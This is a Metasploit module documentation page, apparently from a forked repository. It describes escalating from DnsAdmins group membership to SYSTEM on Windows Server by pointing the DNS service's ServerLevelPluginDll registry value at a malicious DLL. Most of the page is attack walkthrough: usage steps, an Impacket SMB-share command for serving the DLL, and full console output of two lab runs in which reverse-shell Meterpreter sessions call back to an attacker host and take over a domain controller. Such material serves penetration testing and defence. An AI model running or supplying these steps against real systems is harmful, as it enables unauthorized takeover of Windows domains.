adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
151fdb7ea5a6fffc1b490f1c62f2dbdd23e09280
metasploit-gs/documentation/modules/exploit/windows/local/dnsadmin_serverlevelplugindll.md
T

6.8 KiB
Raw Blame History

Introduction

This module exploits a feature in the DNS service of Windows Server. Users of the DnsAdmins group can set the ServerLevelPluginDll value using dnscmd.exe to create a registry key at HKLM\SYSTEM\CurrentControlSet\services\DNS\Parameters\ named ServerLevelPluginDll that can be made to point to an arbitrary DLL. After doing so, restarting the service will load the DLL and cause it to execute, providing us with SYSTEM privileges. Using the Metasploit-generated DLL will cause the service to become unresponsive, and will require removing the registry key and rebooting to get it working again.

Vulnerable Application

Windows Server 2003 and above

Verification Steps

  1. Get a Meterpreter shell
  2. use exploit/windows/local/dnsadmin_serverlevelplugindll
  3. set PAYLOAD <payload>
  4. set LHOST <lhost>
  5. set LPORT <lport>
  6. set SESSION <session_no>
  7. set DLLNAME <dllname> if you want to name your DLL something other than msf.dll
  8. set DLLPATH <dllpath> if you want to place your DLL somewhere other than %TEMP% or want to use a UNC path
  9. exploit to get SYSTEM shell

Options

DLLNAME Name of the DLL to use.

DLLPATH Location of the DLL to use. If a UNC path is provided, the module assumes that the operator already has the prerequisites:

  1. A working SMB2 share (use Impacket's smbserver.py to quickly set up one)
  2. A DLL of the same architecture as the target system

Scenarios

Windows Server 2019 Standard x64, writing msf.dll to %TEMP%

PAYLOAD => windows/x64/meterpreter/reverse_tcp
LHOST => 192.168.137.128
LPORT => 4444
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.137.128:4444 
msf5 exploit(multi/handler) >
[*] Sending stage (206403 bytes) to 192.168.137.133
[*] Meterpreter session 1 opened (192.168.137.128:4444 -> 192.168.137.133:58249) at 2020-02-25 01:40:24 +0800

msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                  Connection
  --  ----  ----                     -----------                  ----------
  1         meterpreter x64/windows  BASILISKCORP\salazar @ DC01  192.168.137.128:4444 -> 192.168.137.133:58249 (192.168.137.133)

msf5 exploit(multi/handler) > use exploit/windows/local/dnsadmin_serverlevelplugindll 
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set SESSION 1 
SESSION => 1
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LHOST 192.168.137.128
LHOST => 192.168.137.128
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LPORT 4444
LPORT => 4444
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > exploit

[*] Started reverse TCP handler on 192.168.137.128:4444 
[*] Running check against DC01 as user BASILISKCORP\salazar...
[+] DNS service found on DC01.
[+] User BASILISKCORP\salazar is part of the DnsAdmins group.
[+] User BASILISKCORP\salazar can start/stop the DNS service.
[*] Checking service state...
[*] DNS service is running, proceeding...
[*] Creating the payload DLL (x64)...
[*] Writing DLL to C:\Users\salazar\AppData\Local\Temp\msf.dll...
[*] Modifying ServerLevelPluginDll to point to C:\Users\salazar\AppData\Local\Temp\msf.dll...
[+] Registry property serverlevelplugindll successfully reset.
[*] Restarting the DNS service...
[*] Sending stage (206403 bytes) to 192.168.137.133
[*] Meterpreter session 2 opened (192.168.137.128:4444 -> 192.168.137.133:58255) at 2020-02-25 01:40:49 +0800

meterpreter > sysinfo
Computer        : DC01
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : BASILISKCORP
Logged On Users : 11
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Windows Server 2019 Standard x64, specifying a UNC path for ServerLevelPluginDll

The fastest way to get a share up and running is to use Impacket's smbserver: sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support -ip 192.168.137.128 test ./

PAYLOAD => windows/x64/meterpreter/reverse_tcp
LHOST => 192.168.137.128
LPORT => 4444
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.137.128:4444 
msf5 exploit(multi/handler) >
[*] Sending stage (206403 bytes) to 192.168.137.133
[*] Meterpreter session 1 opened (192.168.137.128:4444 -> 192.168.137.133:52968) at 2020-02-25 01:43:48 +0800
msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                  Connection
  --  ----  ----                     -----------                  ----------
  1         meterpreter x64/windows  BASILISKCORP\salazar @ DC01  192.168.137.128:4444 -> 192.168.137.133:52968 (192.168.137.133)

msf5 exploit(multi/handler) > use exploit/windows/local/dnsadmin_serverlevelplugindll 
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set SESSION 1 
SESSION => 1
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LHOST 192.168.137.128
LHOST => 192.168.137.128
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LPORT 4444
LPORT => 4444
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLPATH \\\\192.168.137.128\\test
DLLPATH => \\192.168.137.128\test
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLNAME test.dll
DLLNAME => test.dll
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > exploit

[*] Started reverse TCP handler on 192.168.137.128:4444 
[*] Running check against DC01 as user BASILISKCORP\salazar...
[+] DNS service found on DC01.
[+] User BASILISKCORP\salazar is part of the DnsAdmins group.
[+] User BASILISKCORP\salazar can start/stop the DNS service.
[*] Checking service state...
[*] DNS service is running, proceeding...
[*] Using user-provided UNC path.
[*] Modifying ServerLevelPluginDll to point to \\192.168.137.128\test\test.dll...
[+] Registry property serverlevelplugindll successfully reset.
[*] Restarting the DNS service...
[*] Sending stage (206403 bytes) to 192.168.137.133
[*] Meterpreter session 2 opened (192.168.137.128:4444 -> 192.168.137.133:52986) at 2020-02-25 01:46:06 +0800

meterpreter > sysinfo
Computer        : DC01
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : BASILISKCORP
Logged On Users : 12
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Reference in New Issue View Git Blame Copy Permalink